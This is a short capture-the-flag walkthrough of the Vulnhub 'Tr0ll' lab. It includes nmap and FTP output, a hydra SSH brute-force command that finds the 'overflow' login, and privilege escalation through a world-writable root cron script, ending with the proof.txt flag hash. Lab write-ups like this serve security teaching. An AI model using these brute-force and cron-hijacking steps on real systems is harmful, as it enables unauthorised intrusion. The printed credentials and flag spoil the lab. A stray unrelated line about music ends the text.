Vulnhub - Tr0ll.

This Machine was not easy. I had to have a little patience. Cause, when you think you're going to some place, you're not. It got me trolled all the time. Let's start:
# Nmap 7.60 scan initiated Sat Feb 24 11:50:53 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.10 Nmap scan report for 10.0.2.10 Host is up (0.00017s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to 10.0.2.21 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 600 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) | 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) |_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/secret |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:05:66:44 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 24 11:51:07 2018 -- 1 IP address (1 host up) scanned in 13.41 seconds
After running nmap, i tried to access the stuff on robots.txt, that lead to no where. So, i downloaded lol.pcap in ftp. wget ftp://10.0.2.10/lol.pcap --2018-02-24 12:04:00-- ftp://10.0.2.10/lol.pcap => ‘lol.pcap’ Connecting to 10.0.2.10:21... connected. Logging in as anonymous ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD not needed. ==> SIZE lol.pcap ... 8068 ==> PASV ... done. ==> RETR lol.pcap ... done. Length: 8068 (7.9K) (unauthoritative) lol.pcap 100%[================================================================>] 7.88K --.-KB/s in 0s 2018-02-24 12:04:00 (32.5 MB/s) - ‘lol.pcap’ saved [8068]

After download it,i opened that file in wireshark, a nice tool to run in a network. I saw a package that gave me a tip: supersecret.

After that, i download a binary file in this url. I use strings against it. I found an address. After accessing this url, i saw some folders. One gave me a list of users and another one gave me password. I use hydra to crack it. I did it. But, for my surprise, Pass.txt was the password, not the content of Pass.txt. strings roflmao [...] [^_] Find address 0x0856BF to proceed ;*2$" GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2 [...] hydra -L which_one_lol.txt -p "Pass.txt" 10.0.2.10 ssh Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-02-24 13:20:37 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task [DATA] attacking ssh://10.0.2.10:22/ [22][ssh] host: 10.0.2.10 login: overflow password: Pass.txt 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-02-24 13:20:40

After fooling arround in overflowuser, i manage to find to interesting files, after discover that this writable file is managed by root and it runs every two minutes and cleans tmp, i force it to make overflow user a sudoers: [+] World Writable Files -rwxrwxrwx 1 troll root 8068 Aug 10 2014 /srv/ftp/lol.pcap -rwxrwxrwx 1 root root 34 Aug 13 2014 /var/tmp/cleaner.py.swp -rwxrwxrwx 1 root root 7296 Aug 11 2014 /var/www/html/sup3rs3cr3tdirlol/roflmao -rwxrwxrwx 1 root root 23 Aug 13 2014 /var/log/cronlog [...] -rw-rw-rw- 1 root root 0 Mar 17 11:15 /sys/kernel/security/apparmor/.access -rwxrwxrwx 1 root root 96 Aug 13 2014 /lib/log/cleaner.py ----< I MODIFIED THIS FILE TO GET TO ROOT > $ cat /var/log/cronlog */2 * * * * cleaner.py Last login: Sat Mar 17 12:15:13 2018 from 10.0.2.21 Could not chdir to home directory /home/overflow: No such file or directory $ sudo su sudo: unable to resolve host troll [sudo] password for overflow: root@troll:/# ls bin dev home lib media opt root sbin sys usr vmlinuz boot etc initrd.img lost+found mnt proc run srv tmp var root@troll:/# cd /root root@troll:~# ls proof.txt root@troll:~# cat proof.txt Good job, you did it! 702a8c18d29c6f3ca0d99ef5712bfbdc root@troll:~# exit exit $ exit Connection to 10.0.2.10 closed.

Music that makes fun of heavy metal bands: